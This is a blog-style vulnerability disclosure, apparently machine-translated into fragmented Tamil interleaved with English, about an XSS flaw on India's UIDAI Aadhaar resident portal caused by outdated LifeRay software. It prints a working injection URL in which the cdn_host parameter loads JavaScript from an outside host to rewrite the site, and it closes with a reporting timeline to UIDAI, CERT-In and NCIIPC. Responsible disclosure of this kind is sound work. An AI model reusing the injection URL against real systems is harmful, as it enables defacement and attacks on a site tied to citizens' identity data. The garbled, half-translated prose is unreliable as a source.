இல் ஏதுநிலை பதிவாகும் resident.uidai.gov.in allows anyone to change content on the UIDAI website. The UIDAI Resident Portal has direct access to Aadhaar demographic data. The vulnerability (XSS) allows anyone to embed any tweet on the UIDAI website

ஏதுநிலை

The UIDAI Resident Portal (with read access to entire Aadhaar Demographic data) is runing a vulnerable version of LifeRay software. It is running LifeRay 6.1, which was declared End-of-Life in Febrary 2016.

This release includes multiple known vulnerabilities, including:

  1. A XSS issue, for which a PoC can be found at resident.uidai.gov.in (Picture Credits: @sanitarypanels)
  2. Multiple RCEs: See பிரச்சினை-62 for eg.

உண்மையில் வெளியீடு அது கூட தோன்றும் இல்லை எனவே பழமையானது "தெரிந்த வல்னரபிலிட்டீஸ்" page on the LifeRay website; you have to go look at their ஆவணக் காப்பக வல்னரபிலிட்டீஸ்.

POC

நீங்கள் XSS பிரச்சினை க்கான கருத்து ஒரு எளிய சான்று காணலாம் resident.uidai.gov.in.

தி cdn_host அளவுரு இருந்து ஜாவாஸ்கிரிப்ட் செலுத்தியுள்ளார் $CDN_HOST/Resident-theme/js/custom.js, in this case https://scan.bb8.fun/Resident-theme/js/custom.js which hosts a small snippet to overwrite the HTML of the page.

It shows up like:

வேடிக்கை

தற்போதைய ஸ்கிரிப்ட் ஒரு பயன்படுத்தி எந்த ட்வீட் உட்பொதிப்பதை அனுமதிக்கிறது tweet parameter. To embed:

Go to any tweet, copy the part after twitter.com மற்றும் அது கடந்து tweetparameter. For eg, to embed this tweet:

  1. Look at the URL: https://twitter.com/13footwall/status/979301578686345216
  2. நகல் 13footwall/status/979301578686345216 மற்றும் அது கடந்து tweet parameter:
  3. URL ஐ ஆகிறதுhttps://resident.uidai.gov.in/?cdn_host=https://scan.bb8.fun&tweet=13footwall/status/979301578686345216
  4. அதை பகிர்ந்து

அறிக்கை

நான் ஆரம்பத்தில் இந்த தகவல் help@uidai.gov.in in Jan 2017:

Forgot all about it till Jan 2018, when someone mentioned I should try my luck with CERT-IN instead:

This is still not fixed. Here is a complete timeline:

தேதிWhat?
16 Jan 2017ஆரம்பத்தில் அறிக்கை help@uidai.gov.in. No response
21 Jan 2018புகார்செய்யப்படவேண்டியது ceo@uidai.gov.in மற்றும் info@cert-in.org.in. No response
19 Feb 2018நினைவூட்டல் அனுப்பப்படும் ceo@uidai.gov.in மற்றும் info@cert-in.org.in
19 Feb 2018சிஇஆர்டி இருந்து ஒப்புகை
15 Mar 2018Reminder sent. No response
17 Mar 2018அறிவிக்கப்படும் NCIIPC
18 Mar 2018Confirmation from NCIIPC asking for more details. I replied back with a quote of previous exchange
19 Mar 2018Confirmation from NCIIPC thanking me for the report.
19 Apr 2018நினைவூட்டல் இந்திய தனித்துவ அடையாள ஆணையம் அனுப்பி ஒப்புகை கேட்டு
30 May 2018நினைவூட்டல் NCIIPC மற்றும் சிஇஆர்டி புதுப்பிப்பதற்கு கேட்டு அனுப்பப்படும்

நான் என் ஆரம்ப அறிக்கை வலைத்தளத்தில் அறிவிப்பதையும் நிறுத்தி என்று என்பதால் பற்றி நன்றாக தெரியும் என்று மட்டுமே மாற்றம் ஒரு HTTP பதில் தலைப்பு உள்ள லைப்ரே பதிப்பு.

முதலில் வெளியிடப்பட்ட இங்கே.


மறுமொழி இடவும்

உங்கள் மின்னஞ்சல் வெளியிடப்பட மாட்டாது தேவையான புலங்கள் * குறிக்கப்பட்டன